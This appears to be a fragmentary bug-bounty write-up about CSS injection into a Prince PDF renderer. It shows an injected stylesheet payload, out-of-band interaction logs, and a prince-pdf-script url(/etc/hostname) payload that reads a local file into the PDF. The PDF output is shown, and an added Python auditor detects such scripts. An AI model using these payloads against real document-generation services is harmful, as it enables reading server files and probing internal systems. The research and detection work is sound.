Unleashing the power of CSS injection: The access key to an internal API

<style>
body {
color: #7c878e; /* USER-SETTING */
font-family: Arial, Helvetica, sans-serif; /* USER-SETTING */
}

.identity-text {
color: #f3f3f3;}Hi there! I am some new css but I can not escape the style tag to become xss : (
; /* USER-SETTING */
</style>

[c6029550qf512863dfOgcgynjfayyyyyn] Received DNS interaction (AAAA) from xx.xxx.xx.xx at 2021-11-01 17:32:35
[c6029550qf512863dfOgcgynjfayyyyyn] Received DNS interaction (A) from xx.xxx.xx.xxx at 2021-11-01 17:32:35
[c6029550qf512863dfOgcgynjfayyyyyn] Received HTTP interaction from xx.xxx.xx.xxx at 2021-11-01 17:32:35

This property can be used to include JavaScript code that will be executed when the PDF file is opened. A common use case is to activate the “Print” dialog automatically. The script can be located in an external JavaScript file, referenced with the url() function.

@prince-pdf {
prince-pdf-script: "this.print();"
}

The script can be located in an external JavaScript file, referenced with the url() function.

@prince-pdf { 
prince-pdf-script: url(/etc/hostname);
}

4 0 obj
<</S /JavaScript
/JS <FEFF003000330066003800320037006500610065006100350063000A>>>
endobj
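
As an added example (not from the original article or from Prince), this Python check audits a generated PDF for JavaScript actions and decodes a hex-string `/JS` value, using the object above as constructed sample input. It only inspects uncompressed objects; the names `find_js_actions`, `decode_text` and `SAMPLE` are illustrative.

```python
import re

# Constructed sample: the PDF object shown above, as raw bytes.
SAMPLE = (b"4 0 obj\n<</S /JavaScript\n"
          b"/JS <FEFF003000330066003800320037006500610065006100350063000A>>>\n"
          b"endobj\n")

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
ACTION_RE = re.compile(rb"/S\s*/JavaScript\b")
HEX_RE = re.compile(rb"/JS\s*<([0-9A-Fa-f\s]*)>")


def decode_text(raw: bytes) -> str:
    """Decode a PDF text string: UTF-16BE when it starts with a BOM."""
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be", errors="replace")
    # Latin-1 is used here as an approximation of PDFDocEncoding.
    return raw.decode("latin-1")


def find_js_actions(pdf: bytes) -> list[dict]:
    """Return every uncompressed object that carries a JavaScript action."""
    findings = []
    for num, gen, body in OBJ_RE.findall(pdf):
        if not ACTION_RE.search(body):
            continue
        # Stays None when /JS is not a hex string (literal, reference, stream).
        script = None
        m = HEX_RE.search(body)
        if m:
            digits = b"".join(m.group(1).split())
            if len(digits) % 2:  # PDF pads a missing final hex digit with 0
                digits += b"0"
            script = decode_text(bytes.fromhex(digits.decode("ascii")))
        findings.append({"object": f"{int(num)} {int(gen)}", "script": script})
    return findings


if __name__ == "__main__":
    for finding in find_js_actions(SAMPLE):
        print(finding["object"], repr(finding["script"]))
```

Any finding in a PDF rendered from user-controlled styling is worth reviewing, and a decoded script that is not JavaScript at all points to a `url()` reference that resolved to a local file.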

Security researcher at Mission CTRL. Developer at Alserda. Bug bounty hunter on Intigriti. https://www.missionctrl.nl

Sander Wind
